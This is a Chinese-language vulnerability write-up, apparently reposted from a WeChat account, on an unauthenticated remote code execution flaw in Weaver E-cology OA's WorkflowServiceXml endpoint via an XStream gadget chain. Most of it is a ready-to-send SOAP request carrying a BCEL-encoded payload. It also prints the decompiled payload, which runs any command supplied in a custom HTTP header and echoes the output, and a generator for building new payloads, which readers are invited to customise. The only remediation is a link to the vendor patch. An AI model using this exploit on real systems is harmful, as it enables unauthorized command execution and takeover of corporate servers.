0x01 漏洞介绍
E-cology是泛微的大中型企业平台型产品,它依托全新的设计理念,全新的管理思想为中大型组织创建全新的高效协同办公环境。e-cologyOA系统不止可以在PC端办公,还有APP手机端,web移动端,Pad移动端,微信集成快速推动全面移动办公。
泛微E-cology OA系统的WorkflowServiceXml接口存在未授权访问漏洞,远程攻击者可以在未授权情况下调用该接口,通过构造特定的HTTP请求绕过泛微本身一些安全限制从而达成远程代码执行。远程代码执行的漏洞实际上是XStream的远程代码执行漏洞,本POC参考:CVE_2021_21350
0x02 漏洞编号
暂无
0x03 漏洞等级
漏洞等级:严重
0x04 影响范围
e-cology <= 9.0
0x05 漏洞POC
POST /services%20/WorkflowServiceXml HTTP/1.1Host: 10.211.55.18User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SEAccept: */*Connection: closeContent-Type: text/xml;charset=UTF-8potats0: ipconfigContent-Length: 36875<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.services.weaver.com.cn"><soapenv:Header/><soapenv:Body><web:doCreateWorkflowRequest> <web:string><java.util.PriorityQueue serialization='custom'>   <unserializable-parents/>   <java.util.PriorityQueue>     <default>       <size>2</size>       <comparator class='javafx.collections.ObservableList$1'/>     </default>     <int>3</int>     <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>       <dataHandler>         <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>           <contentType>text/plain</contentType>           <is class='java.io.SequenceInputStream'>             <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>               <iterator class='com.sun.tools.javac.processing.JavacProcessingEnvironment$NameProcessIterator'>                 <names class='java.util.AbstractList$Itr'>                   <cursor>0</cursor>                   <lastRet>-1</lastRet>                   <expectedModCount>0</expectedModCount>                   <outer-class class='java.util.Arrays$ArrayList'>                     <a class='string-array'>                       <string>$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$8dV$d9W$TW$i$fe$G$C3$M$c3b$Qa$5c$b1u$J$w$c1$ee$V$a9$VA$5c$g$d0$g$8a$Vm$ed0$5c$60$m$cc$c4$c9D$90$$v$b3$9b$ddwk$b7$97$k_$db$3eDO$7b$da$d3$87$be$d8S$l$da$3f$a8$f6$bb$93$40$J$89$da$9c$93$7b$e7$fe$eeo$bb$bf$ef$bb$bf$99$3f$fe$f9$e9W$A$f7$e3$5b$j$G$S$3a$G0$a8$e1$88$9c$8f$eax$i$c7$e4$90$d40$a4$e3$J$Mk8$ae$e2I$j$3aN$a8$Y$d1q$S$a7$a4$d9SR$f2$b4$86$d3r$7eF$87$85Q9$d8$g$c6T$I$N$e3$3a$9a1$a1aR$85$a3aJ$c5$b4$8e$Uft$ac$81$ab$c1$93sZ$Og$e4$e0k$c8$a8$It$dc$8d$ac$8a$b3$K$aa$bb$j$d7$J$f6$u$a8$8c$b5$P$x$88$f4zcBAC$c2q$c5$60vfT$f8C$d6h$8a$92h$c2$b3$ad$d4$b0$e5$3br$bd$m$M$ect$c6$b3$a7E$40$fd$e9$de$945$3f$af$60Eb$ca$3aku$a6$yw$a2$93$a2Lf7$V$tD$d0$9b$f5$7d$e1$G$c7$c4$99$ac$c8$E$D$KV$_Q$f4$c5xJ$d8A$e7$80$I$s$bd1Z$d4$dbE$ea2$81$ff$b4$8f$8cNQ$99Z$ca$b8$C$b3$8c$9b$7eG$a4$a4$X$cd$X$99$b4$e7f$98$ab$ce$U$8e$fbN$m$7c$86Vf$V4$e6$ed$i$af3$_$de$9d$d79$u$ac$b1P$a7$d2$9e$Z$x$O$9b$M$7c$c7$9d$90a3$K$9a$f2$h$d9$c0Iu$sm$cbuC$P$K$p5$_1$d9$3fg$8bt$e0x$$$f7$o$c1$a4C$c3$9a$c4x$d6$9e$3e$e7e$v$aaK$G$96$3d$3d$60$a5$c3$82$S$Q$S$40$c5$y$e1W1Gt$J$v$f1$q$60$cc$z$e9e$7d$5b$f4$3b$b2$f0F$c1E$5cF2$b0$F$5bU$9c30$8fg$Z$868$d9$G$9e$c3$f3$w$5e0p$k$_$gx$J$_$x$d8j$7b3q$db$ca$da$93$5e$dc$V$c1$ac$e7O$c7SN$s$Qn$7c$c8N$t$XqT$f1$8a$81Wq$81P$96$c0Fj$yC$d7$c0kx$9d$d5$5c$8e$O$8fa$e0$N$bci$e0$z$5c4$f06$$$d2$f6$f4$C$k$fd$96$cd2$hx$H$ef$f2$a4$G$de$c3$fb$G$3e$c0$87$y$cf$oN$qA1B$KbioV$f8b$acm$f4$5c$5b$da$L$ac$m$e3$b5$95$fd$Z$f8$I$l$e7$9d$e5$B$z$ca0$P$a4$C5$efc$tOZ$C$a6$8aO$M$7c$8a$cfdu$3fWPq$aa$c7$c0$r$7ca$e02$be4$f0$V$beV$A$b2$a0$M$d4$G$be$c1V$3a$_$60$a4$a0$f5V$3cW$d0r$L$ee$$d$U$ee$i$cb$ba$813S$e0$f0$e2$a29$d6$9e$u$d1$914$Ts$c2$s$da$b1R$e6$$58$ea$7b$b6$I$_$e7$92$c2$MM$fa$ac$WyY$b8$7d$L$eb$95E$b1$f2RZ6K$7exn$m$e6$82$90$L$J$__j$b3H$7d$c9$96$b4$v$bbA$a8R$7c$I$r$K6$df$n$f7$85$b6$o$e1$5d$a8$e4$de26$tKl$dao$d7s$aa$j$f7$ac7$cd$d2$ee$8a$956$9b$93$a5$a2$f6r$zI$935$c9$l$a3$a9$b4$M$f2$ceS$n$99M$L$df$cek5r$dd$t$b8$m$af$L$d8w$dc$e1$fc$cb$db$5c$5dF$E$3d$b6$84$d3$J$fbr$q6$o$9by$r$3d$x$d8R$e60e3$af$9a$95$b7L$S$abL$f4$e1$oF$W$c8$c3$h$ca$Q$87$dct6$a0$9e$b0fH$e8$853$f3$d6$$$d9$a0$fb$d6X$d9$N$e9$d9$c8fD$9fH93$f9$5b$7e$h$ea$$k$b7$ea$a4$95$Z$q$fb$c2$d7$d7$I$P$ee$86$8bb$ba$$$b6$ed$864$l$82$b0$e5$O$f9$96$z$b0$R$9b$f9$82$95$3fvn$d9E9$c6$80$8avT$a3$96$d2$bf$b7$5d$85r$N$V$d1$ca$i$o$c7$af$a1$w$87$ea$a8$9a$83$96$d8$k$ad$a9$fc$Fz$O$b5$D$3b$U$3e$Z9$d4$Nv$e4P$9fCC$b41$87$V$5d$R3$S$c9$njF$um$ea$aa2i$5b$l$5dY0$ea$aa6$ab$cd$aa$82$ddoh$eeRM5$ba$w$87$W$e9$o$da$g$a1$d6$89$ca$a8$99$94$aa$9a$a9uP$60P$b0$3a$Z$aa$9b$5d5$3fc$cd$J$sf$d60$b1$i$d6$5e$c5$ba$e8$fa$i6t$e9$a6j2$40$db$r$d4$cay$e3$VTE$ef$a2$df$x2$e7$i6$fd$c0$TFp$j$7f$f2$D$a0$S$ed$3c$e3$m$9a8$g$94$d6$a3$O$N0$d1$88MX$818$a2$e8$e6$de$3e$ac$c4a$7ea$8c$60$V$a6$d0$823h$c5$Fj$5d$c2j$fc$c8$_$8a$ebXOokq$D$eb$f0$X6$60$h$bd$cd$d3$9f$89$ef$b1$j$3b$Yo$T$beC$H$fdU$f0$7f$Z$9d$d8$c9$c8$dd$ec$fc$f7$e0$5eF$3d$cc7$d4$7d$94U1$82$c7O$a58k$3f$85$d3x$A$PBe$a4$3e$3cD$99$c6x$3b$f10v$a1$86Q$5b$d0$85$dd$fc$g$baA$fbn$3c$c2$Y$c4$K$7b$f0$u$e7$bd$fc$3b$88$dc$c4$ef$a8U$d1$a3b$9f$8a$5e$V$7d$w$f6$87$p$9f$fb$c3$f1$80$8a$83P$b8$baI$fb$ff$a1Z$R$ae$O$dcd$a6$b4$ea$91$c3$a1$IM$P3$60$F$k$fb$X$9f$s$83$aa$ec$J$A$A </string>                     </a>                   </outer-class>                 </names>                 <processorCL class='com.sun.org.apache.bcel.internal.util.ClassLoader'>                   <parent class='sun.misc.Launcher$ExtClassLoader'>                   </parent>                   <package2certs class='hashtable'/>                   <classes defined-in='java.lang.ClassLoader'/>                   <defaultDomain>                     <classloader class='com.sun.org.apache.bcel.internal.util.ClassLoader' reference='../..'/>                     <principals/>                     <hasAllPerm>false</hasAllPerm>                     <staticPermissions>false</staticPermissions>                     <key>                     </key>                   </defaultDomain> <domains class="java.util.Collections$SynchronizedSet" serialization="custom">         <java.util.Collections_-SynchronizedCollection>           <default>             <c class="set"></c>             <mutex class="java.util.Collections$SynchronizedSet" reference="../../.."/>           </default>         </java.util.Collections_-SynchronizedCollection>       </domains>                  <packages/>                   <nativeLibraries/>                   <assertionLock class='com.sun.org.apache.bcel.internal.util.ClassLoader' reference='..'/>                   <defaultAssertionStatus>false</defaultAssertionStatus>                   <classes/>                   <ignored__packages>                     <string>java.</string>                     <string>javax.</string>                     <string>sun.</string>                   </ignored__packages>                   <repository class='com.sun.org.apache.bcel.internal.util.SyntheticRepository'>                     <__path>                       <paths/>                       <class__path>.</class__path>                     </__path>                     <__loadedClasses/>                   </repository>                   <deferTo class='sun.misc.Launcher$ExtClassLoader' reference='../parent'/>                 </processorCL>               </iterator>               <type>KEYS</type>             </e>             <in class='java.io.ByteArrayInputStream'>               <buf></buf>               <pos>0</pos>               <mark>0</mark>               <count>0</count>             </in>           </is>           <consumed>false</consumed>         </dataSource>         <transferFlavors/>       </dataHandler>       <dataLen>0</dataLen>     </com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>     <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference='../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'/>   </java.util.PriorityQueue> </java.util.PriorityQueue></web:string><web:string>2</web:string></web:doCreateWorkflowRequest></soapenv:Body></soapenv:Envelope>
0x06 漏洞复现
web:string标签中的为关键代码,可以通过burp中的html解码获得明文:
<java.util.PriorityQueue serialization='custom'><unserializable-parents/><java.util.PriorityQueue><default><size>2</size><comparator class='javafx.collections.ObservableList$1'/></default><int>3</int><com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data><dataHandler><dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'><contentType>text/plain</contentType><is class='java.io.SequenceInputStream'><e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'><iterator class='com.sun.tools.javac.processing.JavacProcessingEnvironment$NameProcessIterator'><names class='java.util.AbstractList$Itr'><cursor>0</cursor><lastRet>-1</lastRet><expectedModCount>0</expectedModCount><outer-class class='java.util.Arrays$ArrayList'><a class='string-array'><string>$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$8dV$d9W$TW$i$fe$G$C3$M$c3b$Qa$5c$b1u$J$w$c1$ee$V$a9$VA$5c$g$d0$g$8a$Vm$ed0$5c$60$m$cc$c4$c9D$90$$v$b3$9b$ddwk$b7$97$k_$db$3eDO$7b$da$d3$87$be$d8S$l$da$3f$a8$f6$bb$93$40$J$89$da$9c$93$7b$e7$fe$eeo$bb$bf$ef$bb$bf$99$3f$fe$f9$e9W$A$f7$e3$5b$j$G$S$3a$G0$a8$e1$88$9c$8f$eax$i$c7$e4$90$d40$a4$e3$J$Mk8$ae$e2I$j$3aN$a8$Y$d1q$S$a7$a4$d9SR$f2$b4$86$d3r$7eF$87$85Q9$d8$g$c6T$I$N$e3$3a$9a1$a1aR$85$a3aJ$c5$b4$8e$Uft$ac$81$ab$c1$93sZ$Og$e4$e0k$c8$a8$It$dc$8d$ac$8a$b3$K$aa$bb$j$d7$J$f6$u$a8$8c$b5$P$x$88$f4zcBAC$c2q$c5$60vfT$f8C$d6h$8a$92h$c2$b3$ad$d4$b0$e5$3br$bd$m$M$ect$c6$b3$a7E$40$fd$e9$de$945$3f$af$60Eb$ca$3aku$a6$yw$a2$93$a2Lf7$V$tD$d0$9b$f5$7d$e1$G$c7$c4$99$ac$c8$E$D$KV$_Q$f4$c5xJ$d8A$e7$80$I$s$bd1Z$d4$dbE$ea2$81$ff$b4$8f$8cNQ$99Z$ca$b8$C$b3$8c$9b$7eG$a4$a4$X$cd$X$99$b4$e7f$98$ab$ce$U$8e$fbN$m$7c$86Vf$V4$e6$ed$i$af3$_$de$9d$d79$u$ac$b1P$a7$d2$9e$Z$x$O$9b$M$7c$c7$9d$90a3$K$9a$f2$h$d9$c0Iu$sm$cbuC$P$K$p5$_1$d9$3fg$8bt$e0x$$$f7$o$c1$a4C$c3$9a$c4x$d6$9e$3e$e7e$v$aaK$G$96$3d$3d$60$a5$c3$82$S$Q$S$40$c5$y$e1W1Gt$J$v$f1$q$60$cc$z$e9e$7d$5b$f4$3b$b2$f0F$c1E$5cF2$b0$F$5bU$9c30$8fg$Z$868$d9$G$9e$c3$f3$w$5e0p$k$_$gx$J$_$x$d8j$7b3q$db$ca$da$93$5e$dc$V$c1$ac$e7O$c7SN$s$Qn$7c$c8N$t$XqT$f1$8a$81Wq$81P$96$c0Fj$yC$d7$c0kx$9d$d5$5c$8e$O$8fa$e0$N$bci$e0$z$5c4$f06$$$d2$f6$f4$C$k$fd$96$cd2$hx$H$ef$f2$a4$G$de$c3$fb$G$3e$c0$87$y$cf$oN$qA1B$KbioV$f8b$acm$f4$5c$5b$da$L$ac$m$e3$b5$95$fd$Z$f8$I$l$e7$9d$e5$B$z$ca0$P$a4$C5$efc$tOZ$C$a6$8aO$M$7c$8a$cfdu$3fWPq$aa$c7$c0$r$7ca$e02$be4$f0$V$beV$A$b2$a0$M$d4$G$be$c1V$3a$_$60$a4$a0$f5V$3cW$d0r$L$ee$$d$U$ee$i$cb$ba$813S$e0$f0$e2$a29$d6$9e$u$d1$914$Ts$c2$s$da$b1R$e6$$58$ea$7b$b6$I$_$e7$92$c2$MM$fa$ac$WyY$b8$7d$L$eb$95E$b1$f2RZ6K$7exn$m$e6$82$90$L$J$__j$b3H$7d$c9$96$b4$v$bbA$a8R$7c$I$r$K6$df$n$f7$85$b6$o$e1$5d$a8$e4$de26$tKl$dao$d7s$aa$j$f7$ac7$cd$d2$ee$8a$956$9b$93$a5$a2$f6r$zI$935$c9$l$a3$a9$b4$M$f2$ceS$n$99M$L$df$cek5r$dd$t$b8$m$af$L$d8w$dc$e1$fc$cb$db$5c$5dF$E$3d$b6$84$d3$J$fbr$q6$o$9by$r$3d$x$d8R$e60e3$af$9a$95$b7L$S$abL$f4$e1$oF$W$c8$c3$h$ca$Q$87$dct6$a0$9e$b0fH$e8$853$f3$d6$$$d9$a0$fb$d6X$d9$N$e9$d9$c8fD$9fH93$f9$5b$7e$h$ea$$k$b7$ea$a4$95$Z$q$fb$c2$d7$d7$I$P$ee$86$8bb$ba$$$b6$ed$864$l$82$b0$e5$O$f9$96$z$b0$R$9b$f9$82$95$3fvn$d9E9$c6$80$8avT$a3$96$d2$bf$b7$5d$85r$N$V$d1$ca$i$o$c7$af$a1$w$87$ea$a8$9a$83$96$d8$k$ad$a9$fc$Fz$O$b5$D$3b$U$3e$Z9$d4$Nv$e4P$9fCC$b41$87$V$5d$R3$S$c9$njF$um$ea$aa2i$5b$l$5dY0$ea$aa6$ab$cd$aa$82$ddoh$eeRM5$ba$w$87$W$e9$o$da$g$a1$d6$89$ca$a8$99$94$aa$9a$a9uP$60P$b0$3a$Z$aa$9b$5d5$3fc$cd$J$sf$d60$b1$i$d6$5e$c5$ba$e8$fa$i6t$e9$a6j2$40$db$r$d4$cay$e3$VTE$ef$a2$df$x2$e7$i6$fd$c0$TFp$j$7f$f2$D$a0$S$ed$3c$e3$m$9a8$g$94$d6$a3$O$N0$d1$88MX$818$a2$e8$e6$de$3e$ac$c4a$7ea$8c$60$V$a6$d0$823h$c5$Fj$5d$c2j$fc$c8$_$8a$ebXOokq$D$eb$f0$X6$60$h$bd$cd$d3$9f$89$ef$b1$j$3b$Yo$T$beC$H$fdU$f0$7f$Z$9d$d8$c9$c8$dd$ec$fc$f7$e0$5eF$3d$cc7$d4$7d$94U1$82$c7O$a58k$3f$85$d3x$A$PBe$a4$3e$3cD$99$c6x$3b$f10v$a1$86Q$5b$d0$85$dd$fc$g$baA$fbn$3c$c2$Y$c4$K$7b$f0$u$e7$bd$fc$3b$88$dc$c4$ef$a8U$d1$a3b$9f$8a$5e$V$7d$w$f6$87$p$9f$fb$c3$f1$80$8a$83P$b8$baI$fb$ff$a1Z$R$ae$O$dcd$a6$b4$ea$91$c3$a1$IM$P3$60$F$k$fb$X$9f$s$83$aa$ec$J$A$A</string></a></outer-class></names><processorCL class='com.sun.org.apache.bcel.internal.util.ClassLoader'><parent class='sun.misc.Launcher$ExtClassLoader'></parent><package2certs class='hashtable'/><classes defined-in='java.lang.ClassLoader'/><defaultDomain><classloader class='com.sun.org.apache.bcel.internal.util.ClassLoader' reference='../..'/><principals/><hasAllPerm>false</hasAllPerm><staticPermissions>false</staticPermissions><key></key></defaultDomain><domains class="java.util.Collections$SynchronizedSet" serialization="custom"><java.util.Collections_-SynchronizedCollection><default><c class="set"></c><mutex class="java.util.Collections$SynchronizedSet" reference="../../.."/></default></java.util.Collections_-SynchronizedCollection></domains> <packages/><nativeLibraries/><assertionLock class='com.sun.org.apache.bcel.internal.util.ClassLoader' reference='..'/><defaultAssertionStatus>false</defaultAssertionStatus><classes/><ignored__packages><string>java.</string><string>javax.</string><string>sun.</string></ignored__packages><repository class='com.sun.org.apache.bcel.internal.util.SyntheticRepository'><__path><paths/><class__path>.</class__path></__path><__loadedClasses/></repository><deferTo class='sun.misc.Launcher$ExtClassLoader' reference='../parent'/></processorCL></iterator><type>KEYS</type></e><in class='java.io.ByteArrayInputStream'><buf></buf><pos>0</pos><mark>0</mark><count>0</count></in></is><consumed>false</consumed></dataSource><transferFlavors/></dataHandler><dataLen>0</dataLen></com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data><com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference='../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'/></java.util.PriorityQueue></java.util.PriorityQueue>
以上便是CVE_2021_21350的POC。
追踪string中的BCEL可获得核心poc明文,注意需要去掉前面的$$BCEL$$
解码代码:
import com.sun.org.apache.bcel.internal.classfile.Utility;
//import sun.misc.BASE64Decoder;
import java.io.File;
import java.io.FileOutputStream;
//import java.nio.file.Files;
//import java.nio.file.Path;
//import java.nio.file.Paths;
public class BCEL {
public static void main(String[] args) throws Exception{
byte[] data = Utility.decode("",true);//BCEL需解密原文
File file = new File("echo.class");
FileOutputStream fos = new FileOutputStream(file);
fos.write(data);
fos.close();
}
}
运行后会生成java class文件,在IDE中双击class文件即可自动反编译看到代码。
//// Source code recreated from a .class file by IntelliJ IDEA// (powered by FernFlower decompiler)//import java.io.Writer;import java.lang.reflect.Field;import java.lang.reflect.Method;import java.util.Scanner;public class fuckyou {public fuckyou() {try {Runtime.getRuntime().exec("calc");Class tcpsocketLinkClazz = Thread.currentThread().getContextClassLoader().loadClass("com.caucho.network.listen.TcpSocketLink");Method getCurrentRequestM = tcpsocketLinkClazz.getMethod("getCurrentRequest");Object currentRequest = getCurrentRequestM.invoke((Object)null);Field f = currentRequest.getClass().getSuperclass().getDeclaredField("_responseFacade");f.setAccessible(true);Object response = f.get(currentRequest);Method getWriterM = response.getClass().getMethod("getWriter");Writer w = (Writer)getWriterM.invoke(response);w.write("powered by potatso ");Method getHeaderM = currentRequest.getClass().getMethod("getHeader", String.class);String cmd = (String)getHeaderM.invoke(currentRequest, "potats0");Scanner s = (new Scanner(Runtime.getRuntime().exec(cmd).getInputStream())).useDelimiter("\A");w.write(s.hasNext() ? s.next() : "");} catch (Exception var11) {var11.printStackTrace();}}}
可以根据自己的需要,修改代码后,重新生成BCEL即可
import com.sun.org.apache.bcel.internal.classfile.Utility;import java.io.IOException;import java.io.InputStream;/*** @author threedr3am*/public class Evil {public Evil() throws IOException {Runtime.getRuntime().exec("open -a calculator");}public static void main(String[] args) throws IOException {InputStream inputStream = Evil.class.getResourceAsStream("Evil.class");byte[] bytes = new byte[inputStream.available()];inputStream.read(bytes);String code = Utility.encode(bytes, true);String bcel = "$$BCEL$$" + code;System.out.println(bcel);}}
0x07 漏洞修复
参考官方修复方案:
地址:https://www.weaver.com.cn/cs/securityDownload.html?src=cn
本文始发于微信公众号(锋刃科技):E-cology WorkflowServiceXml远程代码执行
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论